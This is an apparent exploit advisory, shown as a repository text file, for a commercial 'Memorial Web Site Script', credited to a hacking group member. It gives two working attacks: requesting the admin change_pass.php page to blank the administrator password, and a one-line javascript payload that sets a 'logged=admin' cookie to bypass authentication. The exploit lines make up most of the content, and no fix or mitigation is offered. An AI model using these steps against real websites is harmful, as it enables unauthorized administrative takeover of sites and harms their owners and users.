43 lines
No EOL
1 KiB
Text
43 lines
No EOL
1 KiB
Text
-----------------------------------------------------------------------
|
|
Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
|
|
-----------------------------------------------------------------------
|
|
Author : Chip D3 Bi0s
|
|
Email : chipdebios[alt+64]gmail.com
|
|
Where : From Remote
|
|
Group : LatinHackTeam
|
|
|
|
|
|
Affected software description:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Application : Memorial Web Site Script
|
|
Author : Easy Scripts
|
|
Price : $49
|
|
Vendor : http://www.easy-scripts.net
|
|
|
|
description Bug:
|
|
~~~~~~~~~~~~~~~
|
|
|
|
To reset the password just use this:
|
|
|
|
http://127.0.0.1/[path]/admin/change_pass.php
|
|
|
|
so the password will be null, login with single user can
|
|
admin:
|
|
|
|
http://127.0.0.1/[path]/admin/
|
|
|
|
--------------------------
|
|
|
|
Insecure Cookie Handling
|
|
|
|
exploit:
|
|
javascript:document.cookie="logged=admin;path=/";
|
|
|
|
http://127.0.0.1/[path]/admin/
|
|
--------------------------
|
|
|
|
|
|
|
|
+++++++++++++++++++++++++++++++++++++++
|
|
#[!] Produced in South America
|
|
+++++++++++++++++++++++++++++++++++++++ |